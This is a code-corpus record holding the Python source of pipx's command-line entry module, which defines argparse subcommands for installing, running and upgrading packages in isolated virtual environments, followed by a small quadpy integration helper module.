p = subparsers.add_parser(
"uninstall",
help="Uninstall a package",
description="Uninstalls a pipx-managed Virtual Environment by deleting it and any files that point to its apps.",
)
p.add_argument("package").completer = venv_completer
p.add_argument("--verbose", action="store_true")
def _add_uninstall_all(subparsers: argparse._SubParsersAction) -> None:
p = subparsers.add_parser(
"uninstall-all",
help="Uninstall all packages",
description="Uninstall all pipx-managed packages",
)
p.add_argument("--verbose", action="store_true")
def _add_reinstall(subparsers, venv_completer: VenvCompleter) -> None:
p = subparsers.add_parser(
"reinstall",
formatter_class=LineWrapRawTextHelpFormatter,
help="Reinstall a package",
description=textwrap.dedent(
"""
Reinstalls a package.
Package is uninstalled, then installed with pipx install PACKAGE
with the same options used in the original install of PACKAGE.
"""
),
)
p.add_argument("package").completer = venv_completer
p.add_argument(
"--python",
default=DEFAULT_PYTHON,
help=(
"The Python executable used to recreate the Virtual Environment "
"and run the associated app/apps. Must be v3.6+."
),
)
p.add_argument("--verbose", action="store_true")
def _add_reinstall_all(subparsers: argparse._SubParsersAction) -> None:
p = subparsers.add_parser(
"reinstall-all",
formatter_class=LineWrapRawTextHelpFormatter,
help="Reinstall all packages",
description=textwrap.dedent(
"""
Reinstalls all packages.
Packages are uninstalled, then installed with pipx install PACKAGE
with the same options used in the original install of PACKAGE.
This is useful if you upgraded to a new version of Python and want
all your packages to use the latest as well.
"""
),
)
p.add_argument(
"--python",
default=DEFAULT_PYTHON,
help=(
"The Python executable used to recreate the Virtual Environment "
"and run the associated app/apps. Must be v3.6+."
),
)
p.add_argument("--skip", nargs="+", default=[], help="skip these packages")
p.add_argument("--verbose", action="store_true")
def _add_list(subparsers: argparse._SubParsersAction) -> None:
p = subparsers.add_parser(
"list",
help="List installed packages",
description="List packages and apps installed with pipx",
)
p.add_argument(
"--include-injected",
action="store_true",
help="Show packages injected into the main app's environment",
)
p.add_argument(
"--json", action="store_true", help="Output rich data in json format."
)
p.add_argument("--verbose", action="store_true")
def _add_run(subparsers: argparse._SubParsersAction) -> None:
p = subparsers.add_parser(
"run",
formatter_class=LineWrapRawTextHelpFormatter,
help=(
"Download the latest version of a package to a temporary virtual environment, "
"then run an app from it. Also compatible with local `__pypackages__` "
"directory (experimental)."
),
description=textwrap.dedent(
f"""
Download the latest version of a package to a temporary virtual environment,
then run an app from it. The environment will be cached
and re-used for up to {constants.TEMP_VENV_EXPIRATION_THRESHOLD_DAYS} days. This
means subsequent calls to 'run' for the same package will be faster
since they can re-use the cached Virtual Environment.
In support of PEP 582 'run' will use apps found in a local __pypackages__
directory, if present. Please note that this behavior is experimental,
and acts as a companion tool to pythonloc. It may be modified or
removed in the future. See https://github.com/cs01/pythonloc.
"""
),
)
p.add_argument(
"--no-cache",
action="store_true",
help="Do not re-use cached virtual environment if it exists",
)
p.add_argument(
"app_with_args",
metavar="app ...",
nargs=argparse.REMAINDER,
help="app/package name and any arguments to be passed to it",
default=[],
)
p.add_argument(
"--pypackages",
action="store_true",
help="Require app to be run from local __pypackages__ directory",
)
p.add_argument("--spec", help=SPEC_HELP)
p.add_argument("--verbose", action="store_true")
p.add_argument(
"--python",
default=DEFAULT_PYTHON,
help="The Python version to run package's CLI app with. Must be v3.6+.",
)
add_pip_venv_args(p)
p.set_defaults(subparser=p)
# modify usage text to show required app argument
p.usage = re.sub(r"^usage: ", "", p.format_usage())
# add a double-dash to usage text to show requirement before app
p.usage = re.sub(r"\.\.\.", "app ...", p.usage)
def _add_runpip(subparsers, venv_completer: VenvCompleter) -> None:
p = subparsers.add_parser(
"runpip",
help="Run pip in an existing pipx-managed Virtual Environment",
description="Run pip in an existing pipx-managed Virtual Environment",
)
p.add_argument(
"package",
help="Name of the existing pipx-managed Virtual Environment to run pip in",
).completer = venv_completer
p.add_argument(
"pipargs",
nargs=argparse.REMAINDER,
default=[],
help="Arguments to forward to pip command",
)
p.add_argument("--verbose", action="store_true")
def _add_ensurepath(subparsers: argparse._SubParsersAction) -> None:
p = subparsers.add_parser(
"ensurepath",
help=(
"Ensure directories necessary for pipx operation are in your "
"PATH environment variable."
),
description=(
"Ensure directory where pipx stores apps is in your "
"PATH environment variable. Also if pipx was installed via "
"`pip install --user`, ensure pipx itself is in your PATH. "
"Note that running this may modify "
"your shell's configuration file(s) such as '~/.bashrc'."
),
)
p.add_argument(
"--force",
"-f",
action="store_true",
help=(
"Add text to your shell's config file even if it looks like your "
"PATH already contains paths to pipx and pipx-install apps."
),
)
def get_command_parser() -> argparse.ArgumentParser:
venv_container = VenvContainer(constants.PIPX_LOCAL_VENVS)
completer_venvs = InstalledVenvsCompleter(venv_container)
parser = argparse.ArgumentParser(
prog="pipx",
formatter_class=LineWrapRawTextHelpFormatter,
description=PIPX_DESCRIPTION,
)
parser.man_short_description = PIPX_DESCRIPTION.splitlines()[1] # type: ignore
subparsers = parser.add_subparsers(
dest="command", description="Get help for commands with pipx COMMAND --help"
)
_add_install(subparsers)
_add_inject(subparsers, completer_venvs.use)
_add_upgrade(subparsers, completer_venvs.use)
_add_upgrade_all(subparsers)
_add_uninstall(subparsers, completer_venvs.use)
_add_uninstall_all(subparsers)
_add_reinstall(subparsers, completer_venvs.use)
_add_reinstall_all(subparsers)
_add_list(subparsers)
_add_run(subparsers)
_add_runpip(subparsers, completer_venvs.use)
_add_ensurepath(subparsers)
parser.add_argument("--version", action="store_true", help="Print version and exit")
subparsers.add_parser(
"completions",
help="Print instructions on enabling shell completions for pipx",
description="Print instructions on enabling shell completions for pipx",
)
return parser
def delete_oldest_logs(file_list: List[Path], keep_number: int) -> None:
file_list = sorted(file_list)
if len(file_list) > keep_number:
for existing_file in file_list[:-keep_number]:
try:
existing_file.unlink()
except FileNotFoundError:
pass
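# e.g. with keep_number=2, a sorted file_list [Path("a.log"), Path("b.log"),
# Path("c.log")] has only its oldest entry, "a.log", deleted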
def setup_log_file() -> Path:
max_logs = 10
# don't use utils.mkdir, to prevent emission of log message
constants.PIPX_LOG_DIR.mkdir(parents=True, exist_ok=True)
delete_oldest_logs(list(constants.PIPX_LOG_DIR.glob("cmd_*[0-9].log")), max_logs)
delete_oldest_logs(
list(constants.PIPX_LOG_DIR.glob("cmd_*_pip_errors.log")), max_logs
)
datetime_str = time.strftime("%Y-%m-%d_%H.%M.%S")
log_file = constants.PIPX_LOG_DIR / f"cmd_{datetime_str}.log"
counter = 1
while log_file.exists() and counter < 10:
log_file = constants.PIPX_LOG_DIR / f"cmd_{datetime_str}_{counter}.log"
counter += 1
return log_file
def setup_logging(verbose: bool) -> None:
pipx_str = bold(green("pipx >")) if sys.stdout.isatty() else "pipx >"
pipx.constants.pipx_log_file = setup_log_file()
# "incremental" is False so previous pytest tests don't accumulate handlers
logging_config = {
"version": 1,
"formatters": {
"stream_nonverbose": {
"class": "logging.Formatter",
"format": "{message}",
"style": "{",
},
"stream_verbose": {
"class": "logging.Formatter",
"format": pipx_str + "({funcName}:{lineno}): {message}",
"style": "{",
},
"file": {
"class": "logging.Formatter",
"format": "{relativeCreated: >8.1f}ms ({funcName}:{lineno}): {message}",
"style": "{",
},
},
"handlers": {
"stream": {
"class": "logging.StreamHandler",
"formatter": "stream_verbose" if verbose else "stream_nonverbose",
"level": "INFO" if verbose else "WARNING",
},
"file": {
"class": "logging.FileHandler",
"formatter": "file",
"filename": str(pipx.constants.pipx_log_file),
"encoding": "utf-8",
"level": "DEBUG",
},
},
"loggers": {"pipx": {"handlers": ["stream", "file"], "level": "DEBUG"}},
"incremental": False,
}
logging.config.dictConfig(logging_config)
def setup(args: argparse.Namespace) -> None:
if "version" in args and args.version:
print_version()
sys.exit(0)
setup_logging("verbose" in args and args.verbose)
logger.debug(f"{time.strftime('%Y-%m-%d %H:%M:%S')}")
logger.debug(f"{' '.join(sys.argv)}")
logger.info(f"pipx version is {__version__}")
logger.info(f"Default python interpreter is {repr(DEFAULT_PYTHON)}")
mkdir(constants.PIPX_LOCAL_VENVS)
mkdir(constants.LOCAL_BIN_DIR)
mkdir(constants.PIPX_VENV_CACHEDIR)
rmdir(constants.PIPX_TRASH_DIR, False)
old_pipx_venv_location = constants.PIPX_LOCAL_VENVS / "pipx-app"
if old_pipx_venv_location.exists():
logger.warning(
pipx_wrap(
f"""
{hazard} A virtual environment for pipx was detected at
{str(old_pipx_venv_location)}. The 'pipx-app' package has been
renamed back to 'pipx'
(https://github.com/pypa/pipx/issues/82).
""",
subsequent_indent=" " * 4,
)
)
def check_args(parsed_pipx_args: argparse.Namespace) -> None:
if parsed_pipx_args.command == "run":
# we manually discard a first -- because using nargs=argparse.REMAINDER
# will not do it automatically
if parsed_pipx_args.app_with_args and parsed_pipx_args.app_with_args[0] == "--":
parsed_pipx_args.app_with_args.pop(0)
# since we would like app to be required but not in a separate argparse
# add_argument, we implement our own missing required arg error
if not parsed_pipx_args.app_with_args:
parsed_pipx_args.subparser.error(
"the following arguments are required: app"
)
def cli() -> ExitCode:
"""Entry point from command line"""
try:
hide_cursor()
parser = get_command_parser()
argcomplete.autocomplete(parser)
parsed_pipx_args = parser.parse_args()
setup(parsed_pipx_args)
check_args(parsed_pipx_args)
if not parsed_pipx_args.command:
parser.print_help()
return ExitCode(1)
return run_pipx_command(parsed_pipx_args)
except PipxError as e:
print(str(e), file=sys.stderr)
logger.debug(f"PipxError: {e}", exc_info=True)
return ExitCode(1)
except KeyboardInterrupt:
return ExitCode(1)
except Exception:
logger.debug("Uncaught Exception:", exc_info=True)
raise
finally:
logger.debug("pipx finished.")
show_cursor()
if __name__ == "__main__":
sys.exit(cli())
| 34.321608
| 121
| 0.636054
|
import argparse
import logging
import logging.config
import os
import re
import shlex
import sys
import textwrap
import time
import urllib.parse
from pathlib import Path
from typing import Any, Callable, Dict, List
import argcomplete
from packaging.requirements import InvalidRequirement, Requirement
from packaging.utils import canonicalize_name
import pipx.constants
from pipx import commands, constants
from pipx.animate import hide_cursor, show_cursor
from pipx.colors import bold, green
from pipx.constants import ExitCode
from pipx.emojis import hazard
from pipx.interpreter import DEFAULT_PYTHON
from pipx.util import PipxError, mkdir, pipx_wrap, rmdir
from pipx.venv import VenvContainer
from pipx.version import __version__
logger = logging.getLogger(__name__)
VenvCompleter = Callable[[str], List[str]]
def print_version() -> None:
print(__version__)
SPEC_HELP = textwrap.dedent(
"""\
The package name or specific installation source passed to pip.
Runs `pip install -U SPEC`.
For example `--spec mypackage==2.0.0` or `--spec git+https://github.com/user/repo.git@branch`
"""
)
PIPX_DESCRIPTION = textwrap.dedent(
f"""
Install and execute apps from Python packages.
Binaries can either be installed globally into isolated Virtual Environments
or run directly in a temporary Virtual Environment.
Virtual Environment location is {str(constants.PIPX_LOCAL_VENVS)}.
Symlinks to apps are placed in {str(constants.LOCAL_BIN_DIR)}.
"""
)
PIPX_DESCRIPTION += pipx_wrap(
"""
optional environment variables:
PIPX_HOME Overrides default pipx location. Virtual Environments will be installed to $PIPX_HOME/venvs.
PIPX_BIN_DIR Overrides location of app installations. Apps are symlinked or copied here.
USE_EMOJI Overrides emoji behavior. Default value varies based on platform.
PIPX_DEFAULT_PYTHON Overrides default python used for commands.
""",
subsequent_indent=" " * 24,
keep_newlines=True,
)
DOC_DEFAULT_PYTHON = os.getenv("PIPX__DOC_DEFAULT_PYTHON", DEFAULT_PYTHON)
INSTALL_DESCRIPTION = textwrap.dedent(
f"""
The install command is the preferred way to globally install apps
from python packages on your system. It creates an isolated virtual
environment for the package, then ensures the package's apps are
accessible on your $PATH.
The result: apps you can run from anywhere, located in packages
you can cleanly upgrade or uninstall. Guaranteed to not have
dependency version conflicts or interfere with your OS's python
packages. 'sudo' is not required to do this.
pipx install PACKAGE_NAME
pipx install --python PYTHON PACKAGE_NAME
pipx install VCS_URL
pipx install ./LOCAL_PATH
pipx install ZIP_FILE
pipx install TAR_GZ_FILE
The PACKAGE_SPEC argument is passed directly to `pip install`.
The default virtual environment location is {constants.DEFAULT_PIPX_HOME}
and can be overridden by setting the environment variable `PIPX_HOME`
(Virtual Environments will be installed to `$PIPX_HOME/venvs`).
The default app location is {constants.DEFAULT_PIPX_BIN_DIR} and can be
overridden by setting the environment variable `PIPX_BIN_DIR`.
The default python executable used to install a package is
{DOC_DEFAULT_PYTHON} and can be overridden
by setting the environment variable `PIPX_DEFAULT_PYTHON`.
"""
)
class LineWrapRawTextHelpFormatter(argparse.RawDescriptionHelpFormatter):
def _split_lines(self, text: str, width: int) -> List[str]:
text = self._whitespace_matcher.sub(" ", text).strip()
return textwrap.wrap(text, width)
class InstalledVenvsCompleter:
def __init__(self, venv_container: VenvContainer) -> None:
self.packages = [str(p.name) for p in sorted(venv_container.iter_venv_dirs())]
def use(self, prefix: str, **kwargs: Any) -> List[str]:
return [
f"{prefix}{x[len(prefix):]}"
for x in self.packages
if x.startswith(canonicalize_name(prefix))
]
def get_pip_args(parsed_args: Dict[str, str]) -> List[str]:
pip_args: List[str] = []
if parsed_args.get("index_url"):
pip_args += ["--index-url", parsed_args["index_url"]]
if parsed_args.get("pip_args"):
pip_args += shlex.split(parsed_args.get("pip_args", ""))
if parsed_args.get("editable"):
pip_args += ["--editable"]
return pip_args
def get_venv_args(parsed_args: Dict[str, str]) -> List[str]:
venv_args: List[str] = []
if parsed_args.get("system_site_packages"):
venv_args += ["--system-site-packages"]
return venv_args
def run_pipx_command(args: argparse.Namespace) -> ExitCode:
verbose = args.verbose if "verbose" in args else False
pip_args = get_pip_args(vars(args))
venv_args = get_venv_args(vars(args))
venv_container = VenvContainer(constants.PIPX_LOCAL_VENVS)
if "package" in args:
package = args.package
if urllib.parse.urlparse(package).scheme:
raise PipxError("Package cannot be a url")
if "spec" in args and args.spec is not None:
if urllib.parse.urlparse(args.spec).scheme:
if "#egg=" not in args.spec:
args.spec = args.spec + f"#egg={package}"
venv_dir = venv_container.get_venv_dir(package)
logger.info(f"Virtual Environment location is {venv_dir}")
if "skip" in args:
skip_list = [canonicalize_name(x) for x in args.skip]
if args.command == "run":
package_or_url = (
args.spec
if ("spec" in args and args.spec is not None)
else args.app_with_args[0]
)
try:
package_name = Requirement(args.app_with_args[0]).name
except InvalidRequirement:
package_name = args.app_with_args[0]
use_cache = not args.no_cache
commands.run(
package_name,
package_or_url,
args.app_with_args[1:],
args.python,
pip_args,
venv_args,
args.pypackages,
verbose,
use_cache,
)
# We should never reach here because run() is NoReturn.
return ExitCode(1)
elif args.command == "install":
return commands.install(
None,
None,
args.package_spec,
constants.LOCAL_BIN_DIR,
args.python,
pip_args,
venv_args,
verbose,
force=args.force,
include_dependencies=args.include_deps,
suffix=args.suffix,
)
elif args.command == "inject":
return commands.inject(
venv_dir,
None,
args.dependencies,
pip_args,
verbose=verbose,
include_apps=args.include_apps,
include_dependencies=args.include_deps,
force=args.force,
)
elif args.command == "upgrade":
return commands.upgrade(
venv_dir,
pip_args,
verbose,
include_injected=args.include_injected,
force=args.force,
)
elif args.command == "upgrade-all":
return commands.upgrade_all(
venv_container,
verbose,
include_injected=args.include_injected,
skip=skip_list,
force=args.force,
)
elif args.command == "list":
return commands.list_packages(venv_container, args.include_injected, args.json)
elif args.command == "uninstall":
return commands.uninstall(venv_dir, constants.LOCAL_BIN_DIR, verbose)
elif args.command == "uninstall-all":
return commands.uninstall_all(venv_container, constants.LOCAL_BIN_DIR, verbose)
elif args.command == "reinstall":
return commands.reinstall(
venv_dir=venv_dir,
local_bin_dir=constants.LOCAL_BIN_DIR,
python=args.python,
verbose=verbose,
)
elif args.command == "reinstall-all":
return commands.reinstall_all(
venv_container,
constants.LOCAL_BIN_DIR,
args.python,
verbose,
skip=skip_list,
)
elif args.command == "runpip":
if not venv_dir:
raise PipxError("Developer error: venv_dir is not defined.")
return commands.run_pip(package, venv_dir, args.pipargs, args.verbose)
elif args.command == "ensurepath":
try:
return commands.ensure_pipx_paths(force=args.force)
except Exception as e:
logger.debug("Uncaught Exception:", exc_info=True)
raise PipxError(str(e), wrap_message=False)
elif args.command == "completions":
print(constants.completion_instructions)
return ExitCode(0)
else:
raise PipxError(f"Unknown command {args.command}")
def add_pip_venv_args(parser: argparse.ArgumentParser) -> None:
parser.add_argument(
"--system-site-packages",
action="store_true",
help="Give the virtual environment access to the system site-packages dir.",
)
parser.add_argument("--index-url", "-i", help="Base URL of Python Package Index")
parser.add_argument(
"--editable",
"-e",
help="Install a project in editable mode",
action="store_true",
)
parser.add_argument(
"--pip-args",
help="Arbitrary pip arguments to pass directly to pip install/upgrade commands",
)
def add_include_dependencies(parser: argparse.ArgumentParser) -> None:
parser.add_argument(
"--include-deps", help="Include apps of dependent packages", action="store_true"
)
def _add_install(subparsers: argparse._SubParsersAction) -> None:
p = subparsers.add_parser(
"install",
help="Install a package",
formatter_class=LineWrapRawTextHelpFormatter,
description=INSTALL_DESCRIPTION,
)
p.add_argument("package_spec", help="package name or pip installation spec")
add_include_dependencies(p)
p.add_argument("--verbose", action="store_true")
p.add_argument(
"--force",
"-f",
action="store_true",
help="Modify existing virtual environment and files in PIPX_BIN_DIR",
)
p.add_argument(
"--suffix",
default="",
help=(
"Optional suffix for virtual environment and executable names. "
"NOTE: The suffix feature is experimental and subject to change."
),
)
p.add_argument(
"--python",
default=DEFAULT_PYTHON,
help=(
"The Python executable used to create the Virtual Environment and run the "
"associated app/apps. Must be v3.6+."
),
)
add_pip_venv_args(p)
def _add_inject(subparsers, venv_completer: VenvCompleter) -> None:
p = subparsers.add_parser(
"inject",
help="Install packages into an existing Virtual Environment",
description="Installs packages to an existing pipx-managed virtual environment.",
)
p.add_argument(
"package",
help="Name of the existing pipx-managed Virtual Environment to inject into",
).completer = venv_completer
p.add_argument(
"dependencies",
nargs="+",
help="the packages to inject into the Virtual Environment--either package name or pip package spec",
)
p.add_argument(
"--include-apps",
action="store_true",
help="Add apps from the injected packages onto your PATH",
)
add_include_dependencies(p)
add_pip_venv_args(p)
p.add_argument(
"--force",
"-f",
action="store_true",
help="Modify existing virtual environment and files in PIPX_BIN_DIR",
)
p.add_argument("--verbose", action="store_true")
def _add_upgrade(subparsers, venv_completer: VenvCompleter) -> None:
p = subparsers.add_parser(
"upgrade",
help="Upgrade a package",
description="Upgrade a package in a pipx-managed Virtual Environment by running 'pip install --upgrade PACKAGE'",
)
p.add_argument("package").completer = venv_completer
p.add_argument(
"--include-injected",
action="store_true",
help="Also upgrade packages injected into the main app's environment",
)
p.add_argument(
"--force",
"-f",
action="store_true",
help="Modify existing virtual environment and files in PIPX_BIN_DIR",
)
add_pip_venv_args(p)
p.add_argument("--verbose", action="store_true")
def _add_upgrade_all(subparsers: argparse._SubParsersAction) -> None:
p = subparsers.add_parser(
"upgrade-all",
help="Upgrade all packages. Runs `pip install -U <pkgname>` for each package.",
description="Upgrades all packages within their virtual environments by running 'pip install --upgrade PACKAGE'",
)
p.add_argument(
"--include-injected",
action="store_true",
help="Also upgrade packages injected into the main app's environment",
)
p.add_argument("--skip", nargs="+", default=[], help="skip these packages")
p.add_argument(
"--force",
"-f",
action="store_true",
help="Modify existing virtual environment and files in PIPX_BIN_DIR",
)
p.add_argument("--verbose", action="store_true")
def _add_uninstall(subparsers, venv_completer: VenvCompleter) -> None:
p = subparsers.add_parser(
"uninstall",
help="Uninstall a package",
description="Uninstalls a pipx-managed Virtual Environment by deleting it and any files that point to its apps.",
)
p.add_argument("package").completer = venv_completer
p.add_argument("--verbose", action="store_true")
def _add_uninstall_all(subparsers: argparse._SubParsersAction) -> None:
p = subparsers.add_parser(
"uninstall-all",
help="Uninstall all packages",
description="Uninstall all pipx-managed packages",
)
p.add_argument("--verbose", action="store_true")
def _add_reinstall(subparsers, venv_completer: VenvCompleter) -> None:
p = subparsers.add_parser(
"reinstall",
formatter_class=LineWrapRawTextHelpFormatter,
help="Reinstall a package",
description=textwrap.dedent(
"""
Reinstalls a package.
Package is uninstalled, then installed with pipx install PACKAGE
with the same options used in the original install of PACKAGE.
"""
),
)
p.add_argument("package").completer = venv_completer
p.add_argument(
"--python",
default=DEFAULT_PYTHON,
help=(
"The Python executable used to recreate the Virtual Environment "
"and run the associated app/apps. Must be v3.6+."
),
)
p.add_argument("--verbose", action="store_true")
def _add_reinstall_all(subparsers: argparse._SubParsersAction) -> None:
p = subparsers.add_parser(
"reinstall-all",
formatter_class=LineWrapRawTextHelpFormatter,
help="Reinstall all packages",
description=textwrap.dedent(
"""
Reinstalls all packages.
Packages are uninstalled, then installed with pipx install PACKAGE
with the same options used in the original install of PACKAGE.
This is useful if you upgraded to a new version of Python and want
all your packages to use the latest as well.
"""
),
)
p.add_argument(
"--python",
default=DEFAULT_PYTHON,
help=(
"The Python executable used to recreate the Virtual Environment "
"and run the associated app/apps. Must be v3.6+."
),
)
p.add_argument("--skip", nargs="+", default=[], help="skip these packages")
p.add_argument("--verbose", action="store_true")
def _add_list(subparsers: argparse._SubParsersAction) -> None:
p = subparsers.add_parser(
"list",
help="List installed packages",
description="List packages and apps installed with pipx",
)
p.add_argument(
"--include-injected",
action="store_true",
help="Show packages injected into the main app's environment",
)
p.add_argument(
"--json", action="store_true", help="Output rich data in json format."
)
p.add_argument("--verbose", action="store_true")
def _add_run(subparsers: argparse._SubParsersAction) -> None:
p = subparsers.add_parser(
"run",
formatter_class=LineWrapRawTextHelpFormatter,
help=(
"Download the latest version of a package to a temporary virtual environment, "
"then run an app from it. Also compatible with local `__pypackages__` "
"directory (experimental)."
),
description=textwrap.dedent(
f"""
Download the latest version of a package to a temporary virtual environment,
then run an app from it. The environment will be cached
and re-used for up to {constants.TEMP_VENV_EXPIRATION_THRESHOLD_DAYS} days. This
means subsequent calls to 'run' for the same package will be faster
since they can re-use the cached Virtual Environment.
In support of PEP 582 'run' will use apps found in a local __pypackages__
directory, if present. Please note that this behavior is experimental,
and acts as a companion tool to pythonloc. It may be modified or
removed in the future. See https://github.com/cs01/pythonloc.
"""
),
)
p.add_argument(
"--no-cache",
action="store_true",
help="Do not re-use cached virtual environment if it exists",
)
p.add_argument(
"app_with_args",
metavar="app ...",
nargs=argparse.REMAINDER,
help="app/package name and any arguments to be passed to it",
default=[],
)
p.add_argument(
"--pypackages",
action="store_true",
help="Require app to be run from local __pypackages__ directory",
)
p.add_argument("--spec", help=SPEC_HELP)
p.add_argument("--verbose", action="store_true")
p.add_argument(
"--python",
default=DEFAULT_PYTHON,
help="The Python version to run package's CLI app with. Must be v3.6+.",
)
add_pip_venv_args(p)
p.set_defaults(subparser=p)
# modify usage text to show required app argument
p.usage = re.sub(r"^usage: ", "", p.format_usage())
# add a double-dash to usage text to show requirement before app
p.usage = re.sub(r"\.\.\.", "app ...", p.usage)
def _add_runpip(subparsers, venv_completer: VenvCompleter) -> None:
p = subparsers.add_parser(
"runpip",
help="Run pip in an existing pipx-managed Virtual Environment",
description="Run pip in an existing pipx-managed Virtual Environment",
)
p.add_argument(
"package",
help="Name of the existing pipx-managed Virtual Environment to run pip in",
).completer = venv_completer
p.add_argument(
"pipargs",
nargs=argparse.REMAINDER,
default=[],
help="Arguments to forward to pip command",
)
p.add_argument("--verbose", action="store_true")
def _add_ensurepath(subparsers: argparse._SubParsersAction) -> None:
p = subparsers.add_parser(
"ensurepath",
help=(
"Ensure directories necessary for pipx operation are in your "
"PATH environment variable."
),
description=(
"Ensure directory where pipx stores apps is in your "
"PATH environment variable. Also if pipx was installed via "
"`pip install --user`, ensure pipx itself is in your PATH. "
"Note that running this may modify "
"your shell's configuration file(s) such as '~/.bashrc'."
),
)
p.add_argument(
"--force",
"-f",
action="store_true",
help=(
"Add text to your shell's config file even if it looks like your "
"PATH already contains paths to pipx and pipx-install apps."
),
)
def get_command_parser() -> argparse.ArgumentParser:
venv_container = VenvContainer(constants.PIPX_LOCAL_VENVS)
completer_venvs = InstalledVenvsCompleter(venv_container)
parser = argparse.ArgumentParser(
prog="pipx",
formatter_class=LineWrapRawTextHelpFormatter,
description=PIPX_DESCRIPTION,
)
parser.man_short_description = PIPX_DESCRIPTION.splitlines()[1] # type: ignore
subparsers = parser.add_subparsers(
dest="command", description="Get help for commands with pipx COMMAND --help"
)
_add_install(subparsers)
_add_inject(subparsers, completer_venvs.use)
_add_upgrade(subparsers, completer_venvs.use)
_add_upgrade_all(subparsers)
_add_uninstall(subparsers, completer_venvs.use)
_add_uninstall_all(subparsers)
_add_reinstall(subparsers, completer_venvs.use)
_add_reinstall_all(subparsers)
_add_list(subparsers)
_add_run(subparsers)
_add_runpip(subparsers, completer_venvs.use)
_add_ensurepath(subparsers)
parser.add_argument("--version", action="store_true", help="Print version and exit")
subparsers.add_parser(
"completions",
help="Print instructions on enabling shell completions for pipx",
description="Print instructions on enabling shell completions for pipx",
)
return parser
def delete_oldest_logs(file_list: List[Path], keep_number: int) -> None:
file_list = sorted(file_list)
if len(file_list) > keep_number:
for existing_file in file_list[:-keep_number]:
try:
existing_file.unlink()
except FileNotFoundError:
pass
def setup_log_file() -> Path:
max_logs = 10
# don't use utils.mkdir, to prevent emission of log message
constants.PIPX_LOG_DIR.mkdir(parents=True, exist_ok=True)
delete_oldest_logs(list(constants.PIPX_LOG_DIR.glob("cmd_*[0-9].log")), max_logs)
delete_oldest_logs(
list(constants.PIPX_LOG_DIR.glob("cmd_*_pip_errors.log")), max_logs
)
datetime_str = time.strftime("%Y-%m-%d_%H.%M.%S")
log_file = constants.PIPX_LOG_DIR / f"cmd_{datetime_str}.log"
counter = 1
while log_file.exists() and counter < 10:
log_file = constants.PIPX_LOG_DIR / f"cmd_{datetime_str}_{counter}.log"
counter += 1
return log_file
def setup_logging(verbose: bool) -> None:
pipx_str = bold(green("pipx >")) if sys.stdout.isatty() else "pipx >"
pipx.constants.pipx_log_file = setup_log_file()
logging_config = {
"version": 1,
"formatters": {
"stream_nonverbose": {
"class": "logging.Formatter",
"format": "{message}",
"style": "{",
},
"stream_verbose": {
"class": "logging.Formatter",
"format": pipx_str + "({funcName}:{lineno}): {message}",
"style": "{",
},
"file": {
"class": "logging.Formatter",
"format": "{relativeCreated: >8.1f}ms ({funcName}:{lineno}): {message}",
"style": "{",
},
},
"handlers": {
"stream": {
"class": "logging.StreamHandler",
"formatter": "stream_verbose" if verbose else "stream_nonverbose",
"level": "INFO" if verbose else "WARNING",
},
"file": {
"class": "logging.FileHandler",
"formatter": "file",
"filename": str(pipx.constants.pipx_log_file),
"encoding": "utf-8",
"level": "DEBUG",
},
},
"loggers": {"pipx": {"handlers": ["stream", "file"], "level": "DEBUG"}},
"incremental": False,
}
logging.config.dictConfig(logging_config)
def setup(args: argparse.Namespace) -> None:
if "version" in args and args.version:
print_version()
sys.exit(0)
setup_logging("verbose" in args and args.verbose)
logger.debug(f"{time.strftime('%Y-%m-%d %H:%M:%S')}")
logger.debug(f"{' '.join(sys.argv)}")
logger.info(f"pipx version is {__version__}")
logger.info(f"Default python interpreter is {repr(DEFAULT_PYTHON)}")
mkdir(constants.PIPX_LOCAL_VENVS)
mkdir(constants.LOCAL_BIN_DIR)
mkdir(constants.PIPX_VENV_CACHEDIR)
rmdir(constants.PIPX_TRASH_DIR, False)
old_pipx_venv_location = constants.PIPX_LOCAL_VENVS / "pipx-app"
if old_pipx_venv_location.exists():
logger.warning(
pipx_wrap(
f"""
{hazard} A virtual environment for pipx was detected at
{str(old_pipx_venv_location)}. The 'pipx-app' package has been
renamed back to 'pipx'
(https://github.com/pypa/pipx/issues/82).
""",
subsequent_indent=" " * 4,
)
)
def check_args(parsed_pipx_args: argparse.Namespace) -> None:
if parsed_pipx_args.command == "run":
# we manually discard a first -- because using nargs=argparse.REMAINDER
# will not do it automatically
if parsed_pipx_args.app_with_args and parsed_pipx_args.app_with_args[0] == "--":
parsed_pipx_args.app_with_args.pop(0)
# since we would like app to be required but not in a separate argparse
# add_argument, we implement our own missing required arg error
if not parsed_pipx_args.app_with_args:
parsed_pipx_args.subparser.error(
"the following arguments are required: app"
)
def cli() -> ExitCode:
try:
hide_cursor()
parser = get_command_parser()
argcomplete.autocomplete(parser)
parsed_pipx_args = parser.parse_args()
setup(parsed_pipx_args)
check_args(parsed_pipx_args)
if not parsed_pipx_args.command:
parser.print_help()
return ExitCode(1)
return run_pipx_command(parsed_pipx_args)
except PipxError as e:
print(str(e), file=sys.stderr)
logger.debug(f"PipxError: {e}", exc_info=True)
return ExitCode(1)
except KeyboardInterrupt:
return ExitCode(1)
except Exception:
logger.debug("Uncaught Exception:", exc_info=True)
raise
finally:
logger.debug("pipx finished.")
show_cursor()
if __name__ == "__main__":
sys.exit(cli())
| true
| true
|
f70b47643839b003e1a33b6eff6fc4f5f1de1581
| 410
|
py
|
Python
|
quadpy/e3r/tools.py
|
gdmcbain/quadpy
|
c083d500027d7c1b2187ae06ff2b7fbdd360ccc7
|
[
"MIT"
] | 1
|
2019-01-02T19:04:42.000Z
|
2019-01-02T19:04:42.000Z
|
quadpy/e3r/tools.py
|
gdmcbain/quadpy
|
c083d500027d7c1b2187ae06ff2b7fbdd360ccc7
|
[
"MIT"
] | null | null | null |
quadpy/e3r/tools.py
|
gdmcbain/quadpy
|
c083d500027d7c1b2187ae06ff2b7fbdd360ccc7
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
#
import numpy
from .. import helpers
def integrate(f, rule, dot=numpy.dot):
flt = numpy.vectorize(float)
return dot(f(flt(rule.points).T), flt(rule.weights))
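# Hedged usage sketch (assumes rule.points has shape (n, 3), so f receives a
# (3, n) array and must return one value per point):
# value = integrate(lambda x: numpy.ones(x.shape[1]), rule)  # integrates f == 1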
def show(scheme, backend="mpl"):
"""Displays scheme for E_3^r quadrature.
"""
helpers.backend_to_function[backend](
scheme.points, scheme.weights, volume=8 * numpy.pi, edges=[]
)
return
| 20.5
| 68
| 0.641463
|
import numpy
from .. import helpers
def integrate(f, rule, dot=numpy.dot):
flt = numpy.vectorize(float)
return dot(f(flt(rule.points).T), flt(rule.weights))
